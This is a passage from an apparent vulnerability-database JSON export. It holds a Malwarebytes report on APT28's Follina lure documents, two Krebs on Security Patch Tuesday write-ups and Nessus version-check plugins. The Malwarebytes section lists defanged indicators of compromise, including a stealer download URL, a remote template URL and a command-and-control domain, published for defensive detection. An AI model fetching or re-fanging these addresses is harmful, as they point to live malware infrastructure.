intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state. Ukraine continues to be a battleground for cyberattacks and espionage, as well as devastating kinetic warfare and humanitarian abuses.\n\nFor more coverage of threat actors active in the Ukraine conflict, read our recent article about the efforts of an unknown APT group that has [targeted Russia repeatedly since Ukraine invasion](<https://blog.malwarebytes.com/threat-intelligence/2022/05/unknown-apt-group-has-targeted-russia-repeatedly-since-ukraine-invasion/>).\n\n## Protection\n\nMalwarebytes customers were proactively protected against this campaign thanks to our anti-exploit protection.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2022/06/nebula-protects-against-APT28-campaign.png)\n\n## IOCs\n\n**Maldoc: \n**Nuclear Terrorism A Very Real Threat.rtf \ndaaa271cee97853bf4e235b55cb34c1f03ea6f8d3c958f86728d41f418b0bf01 \n \n**Remote template (Follina): \n**http://kitten-268.frge[.]io/article.html \n \n**Stealer: \n**http://kompartpomiar[.]pl/grafika/docx.exe \n2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933 \n \n**C2: \n**www.specialityllc[.]com \n[](<https://twitter.com/h2jazi/status/1538957205210337280/photo/1>)\n\nThe post [Russia's APT28 uses fear of nuclear war to spread Follina docs in Ukraine](<https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-21T15:25:09", "type": "malwarebytes", "title": "Russia\u2019s APT28 uses fear of nuclear war to spread Follina docs in Ukraine", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-21T15:25:09", "id": "MALWAREBYTES:69B09CC9DBBA58546698D97B0C4BAAF0", "href": "https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2022-07-16T21:59:04", "description": "**Microsoft** today released updates to fix at least 86 security vulnerabilities in its **Windows** operating systems and other software, including a weakness in all supported versions of Windows that Microsoft warns is actively being exploited. The software giant also has made a controversial decision to put the brakes on a plan to block **macros** in **Office** documents downloaded from the Internet.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2022/07/winupdatedate.png)\n\nIn February, security experts hailed Microsoft's decision to block VBA macros in all documents downloaded from the Internet. The company said it would roll out the changes in stages between April and June 2022.\n\nMacros have long been a trusted way for cybercrooks to trick people into running malicious code. Microsoft Office by default warns users that enabling macros in untrusted documents is a security risk, but those warnings can be easily disabled with the click of button. Under Microsoft's plan, the new warnings provided no such way to enable the macros.\n\nAs _Ars Technica_ veteran reporter **Dan Goodin** [put it](<https://arstechnica.com/information-technology/2022/07/microsoft-makes-major-course-reversal-allows-office-to-run-untrusted-macros/>), "security professionals\u2014some who have spent the past two decades watching clients and employees get infected with ransomware, wipers, and espionage with frustrating regularity\u2014cheered the change."\n\nBut last week, Microsoft abruptly changed course. As [first reported](<https://www.bleepingcomputer.com/news/microsoft/microsoft-rolls-back-decision-to-block-office-macros-by-default/>) by _BleepingComputer_, Redmond said it would roll back the changes based on feedback from users.\n\n"While Microsoft has not shared the negative feedback that led to the rollback of this change, users have reported that they are unable to find the Unblock button to remove the Mark-of-the-Web from downloaded files, making it impossible to enable macros," Bleeping's **Sergiu Gatlan** wrote.\n\nMicrosoft later said the decision to roll back turning off macros by default was temporary, although it has not indicated when this important change might be made for good.\n\nThe zero-day Windows vulnerability already seeing active attacks is [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), which is an elevation of privilege vulnerability in all supported versions of Windows. Trend Micro's **Zero Day Initiative** notes that while this bug is listed as being under active attack, there\u2019s no information from Microsoft on where or how widely it is being exploited.\n\n"The vulnerability allows an attacker to execute code as SYSTEM, provided they can execute other code on the target," ZDI's Dustin Childs [wrote](<https://www.zerodayinitiative.com/blog/2022/7/12/the-july-2022-security-update-review>). "Bugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. These attacks often rely on macros, which is why so many were disheartened to hear Microsoft\u2019s delay in blocking all Office macros by default."\n\n**Kevin Breen**, director of cyber threat research at **Immersive Labs**, said CVE-2022-22047 is the kind of vulnerability that is typically seen abused after a target has already been compromised.\n\n"Crucially, it allows the attacker to escalate their permissions from that of a normal user to the same permissions as the SYSTEM," he said. "With this level of access, the attackers are able to disable local services such as Endpoint Detection and Security tools. With SYSTEM access they can also deploy tools like Mimikatz which can be used to recover even more admin and domain level accounts, spreading the threat quickly."\n\nAfter a brief reprieve from patching serious security problems in the **Windows Print Spooler** service, we are back to business as usual. July's patch batch contains fixes for four separate elevation of privilege vulnerabilities in Windows Print Spooler, identified as [CVE-2022-22022](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22022>), [CVE-2022-22041](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22041>), [CVE-2022-30206](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30206>), and [CVE-2022-30226](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30226>). Experts at security firm **Tenable** note that these four flaws provide attackers with the ability to delete files or gain SYSTEM level privileges on a vulnerable system.\n\nRoughly a third of the patches issued today involve weaknesses in Microsoft's Azure Site Recovery offering. Other components seeing updates this month include **Microsoft Defender for Endpoint**; **Microsoft Edge** (Chromium-based); **Office**; **Windows BitLocker**; **Windows Hyper-V**; **Skype for Business** and **Microsoft Lync**; and **Xbox**.\n\nFour of the flaws fixed this month address vulnerabilities Microsoft rates "critical," meaning they could be used by malware or malcontents to assume remote control over unpatched Windows systems, usually without any help from users. [CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) and [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>) affect Network File System (NFS) servers, and [CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>) affects the Remote Procedure Call (RPC) runtime.\n\n"Although all three of these will be relatively tricky for attackers to exploit due to the amount of sustained data that needs to be transmitted, administrators should patch sooner rather than later," said **Greg Wiseman**, product manager at **Rapid7**. "[CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>) supposedly affects the Windows Graphics Component, though Microsoft\u2019s FAQ indicates that exploitation requires users to access a malicious RDP server."\n\nSeparately, Adobe today [issued patches](<https://helpx.adobe.com/security.html>) to address at least 27 vulnerabilities across multiple products, including **Acrobat** and **Reader**, **Photoshop**, **RoboHelp**, and **Adobe Character Animator**.\n\nFor a closer look at the patches released by Microsoft today and indexed by severity and other metrics, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft%20July%202022%20Patch%20Tuesday/28838/>) from the **SANS Internet Storm Center**. And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/>) usually has the lowdown on any patches that may be causing problems for Windows users.\n\nAs always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these updates, please drop a note about it here in the comments.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-13T01:02:49", "type": "krebs", "title": "Microsoft Patch Tuesday, July 2022 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22022", "CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22041", "CVE-2022-22047", "CVE-2022-30206", "CVE-2022-30221", "CVE-2022-30226"], "modified": "2022-07-13T01:02:49", "id": "KREBS:4D5B2D5FA1A6E077B46D7F3051319E72", "href": "https://krebsonsecurity.com/2022/07/microsoft-patch-tuesday-july-2022-edition/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-24T22:07:49", "description": "**Microsoft** on Tuesday released software updates to fix 60 security vulnerabilities in its **Windows** operating systems and other software, including a zero-day flaw in all supported **Microsoft Office** versions on all flavors of Windows that's seen active exploitation for at least two months now. On a lighter note, Microsoft is officially retiring its **Internet Explorer** (IE) web browser, which turns 27 years old this year.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2021/07/windupate.png)\n\nThree of the bugs tackled this month earned Microsoft's most dire "critical" label, meaning they can be exploited remotely by malware or miscreants to seize complete control over a vulnerable system. On top of the critical heap this month is [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>), a vulnerability in the **Microsoft Support Diagnostics Tool** (MSDT), a service built into Windows.\n\nDubbed "**Follina**," the flaw became public knowledge on May 27, when a security researcher [tweeted](<https://twitter.com/nao_sec/status/1530196847679401984>) about a malicious **Word** document that had surprisingly low detection rates by antivirus products. Researchers soon learned that the malicious document was using a feature in Word to retrieve a HTML file from a remote server, and that HTML file in turn used MSDT to load code and execute PowerShell commands.\n\n"What makes this new MS Word vulnerability unique is the fact that there are no macros exploited in this attack," writes **Mayuresh Dani**, manager of threat research at **Qualys**. "Most malicious Word documents leverage the macro feature of the software to deliver their malicious payload. As a result, normal macro-based scanning methods will not work to detect Follina. All an attacker needs to do is lure a targeted user to download a Microsoft document or view an HTML file embedded with the malicious code."\n\n**Kevin Beaumont**, the researcher who gave Follina its name, penned [a fairly damning account and timeline](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e?gi=544f02649952>) of Microsoft's response to being alerted about the weakness. Beaumont says researchers in March 2021 told Microsoft they were able achieve the same exploit using Microsoft Teams as an example, and that Microsoft silently fixed the issue in Teams but did not patch MSDT in Windows or the attack vector in Microsoft Office.\n\nBeaumont said other researchers on April 12, 2022 told Microsoft about active exploitation of the MSDT flaw, but Microsoft closed the ticket saying it wasn't a security issue. Microsoft finally issued a CVE for the problem on May 30, the same day it [released recommendations](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on how to mitigate the threat from the vulnerability.\n\nMicrosoft also is taking flak from security experts regarding a different set of flaws in its Azure cloud hosting platform. **Orca Security** said that [back on January 4](<https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/>) it told Microsoft about a critical bug in Azure's **Synapse** service that allowed attackers to obtain credentials to other workspaces, execute code, or leak customer credentials to data sources outside of Azure.\n\nIn [an update](<https://orca.security/resources/blog/azure-synapse-analytics-security-advisory/>) to their research published Tuesday, Orca researchers said they were able to bypass Microsoft's fix for the issue twice before the company put a working fix in place.\n\n"In previous cases, vulnerabilities were fixed by the cloud providers within a few days of our disclosure to the affected vendor," wrote Orca's **Avi Shua**. "Based on our understanding of the architecture of the service, and our repeated bypasses of fixes, we think that the architecture contains underlying weaknesses that should be addressed with a more robust tenant separation mechanism. Until a better solution is implemented, we advise that all customers assess their usage of the service and refrain from storing sensitive data or keys in it."\n\n**Amit Yoran**, CEO of **Tenable** and a former U.S. cybersecurity czar, took Microsoft to task for silently patching an issue Tenable reported in the same Azure Synapse service.\n\n"It was only after being told that we were going to go public, that their story changed\u202689 days after the initial vulnerability notification\u2026when they privately acknowledged the severity of the security issue," Yoran wrote in [a post on LinkedIn](<https://www.linkedin.com/pulse/microsofts-vulnerability-practices-put-customers-risk-amit-yoran/?trackingId=PLcDXIRdRxuq%2FQ4RDpyEHA%3D%3D>). "To date, Microsoft customers have not been notified. Without timely and detailed disclosures, customers have no idea if they were, or are, vulnerable to attack\u2026or if they fell victim to attack prior to a vulnerability being patched. And not notifying customers denies them the opportunity to look for evidence that they were or were not compromised, a grossly irresponsible policy."\n\nAlso in the critical and notable stack this month is [CVE-2022-30136](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30136>), which is a remote code execution flaw in the **Windows Network File System** (NFS version 4.1) that earned a CVSS score of 9.8 (10 being the worst). Microsoft issued a very similar patch last month for vulnerabilities in NFS versions 2 and 3.\n\n"This vulnerability could allow a remote attacker to execute privileged code on affected systems running NFS. On the surface, the only difference between the patches is that this month\u2019s update fixes a bug in NFSV4.1, whereas last month\u2019s bug only affected versions NSFV2.0 and NSFV3.0," wrote **Trend Micro's Zero Day Initiative**. "It\u2019s not clear if this is a variant or a failed patch or a completely new issue. Regardless, enterprises running NFS should prioritize testing and deploying this fix."\n\nBeginning today, Microsoft will officially stop supporting most versions of its Internet Explorer Web browser, which was launched in August 1995. The IE desktop application will be disabled, and Windows users who wish to stick with a Microsoft browser are encouraged to move to Microsoft Edge with IE mode, which will be supported through at least 2029.\n\nFor a closer look at the patches released by Microsoft today and indexed by severity and other metrics, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft+June+2022+Patch+Tuesday/28742/>) from the **SANS Internet Storm Center**. And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/>) usually has the dirt on any patches that may be causing problems for Windows users.\n\nAs always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these updates, please drop a note about it here in the comments.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-15T04:52:30", "type": "krebs", "title": "Microsoft Patch Tuesday, June 2022 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30136", "CVE-2022-30190"], "modified": "2022-06-15T04:52:30", "id": "KREBS:2752861A306F74170D69FBD9E0DC3AAB", "href": "https://krebsonsecurity.com/2022/06/microsoft-patch-tuesday-june-2022-edition/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-10-28T15:10:05", "description": "The version of Microsoft Edge installed on the remote Windows host is prior to 103.0.1264.49. It is, therefore, affected by a vulnerability as referenced in the July 6, 2022 advisory.\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-07T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 103.0.1264.49 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-2294", "CVE-2022-2295"], "modified": "2023-10-19T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_103_0_1264_49.NASL", "href": "https://www.tenable.com/plugins/nessus/162776", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162776);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/19\");\n\n script_cve_id(\"CVE-2022-2294\");\n script_xref(name:\"IAVA\", value:\"2022-A-0262-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/15\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 103.0.1264.49 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge installed on the remote Windows host is prior to 103.0.1264.49. It is, therefore, affected\nby a vulnerability as referenced in the July 6, 2022 advisory.\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://docs.microsoft.com/en-us/DeployEdge/microsoft-edge-relnotes-security#july-6-2022\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c255ed38\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2294\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2295\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge version 103.0.1264.49 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-2294\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar app_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\nvar constraints = [\n { 'fixed_version' : '103.0.1264.49' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-28T15:10:31", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in the openSUSE-SU-2022:10055-1 advisory.\n\n - This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information. (CVE-2022-2294, CVE-2022-2295)\n\n - Use after free in Chrome OS Shell. (CVE-2022-2296)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-13T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : chromium (openSUSE-SU-2022:10055-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296"], "modified": "2023-03-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromium", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2022-10055-1.NASL", "href": "https://www.tenable.com/plugins/nessus/163078", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2022:10055-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163078);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/23\");\n\n script_cve_id(\"CVE-2022-2294\", \"CVE-2022-2295\", \"CVE-2022-2296\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/15\");\n\n script_name(english:\"openSUSE 15 Security Update : chromium (openSUSE-SU-2022:10055-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2022:10055-1 advisory.\n\n - This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this\n vulnerability. Please see Google Chrome Releases for more information. (CVE-2022-2294, CVE-2022-2295)\n\n - Use after free in Chrome OS Shell. (CVE-2022-2296)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1201216\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/TJ5LTW7LEHL5JFGRUX2J7S5CEEACPAUP/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7dcbbe96\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2294\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2295\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2296\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromedriver and / or chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-2296\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'chromedriver-103.0.5060.114-bp153.2.107.1', 'cpu':'aarch64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromedriver-103.0.5060.114-bp153.2.107.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromium-103.0.5060.114-bp153.2.107.1', 'cpu':'aarch64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromium-103.0.5060.114-bp153.2.107.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromedriver / chromium');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-28T15:09:12", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by multiple vulnerabilities as referenced in the 744ec9d7-fe0f-11ec-bcd2-3065ec8fd3ec advisory.\n\n - Use after free in Chrome OS Shell in Google Chrome on Chrome OS prior to 103.0.5060.114 allowed a remote attacker who convinced a user to engage in specific user interactions to potentially exploit heap corruption via direct UI interactions. (CVE-2022-2296)\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\n - Type confusion in V8 in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2295)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-08T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (744ec9d7-fe0f-11ec-bcd2-3065ec8fd3ec)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296"], "modified": "2023-03-23T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_744EC9D7FE0F11ECBCD23065EC8FD3EC.NASL", "href": "https://www.tenable.com/plugins/nessus/162839", "sourceData": "#\n# (C) Tenable, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database 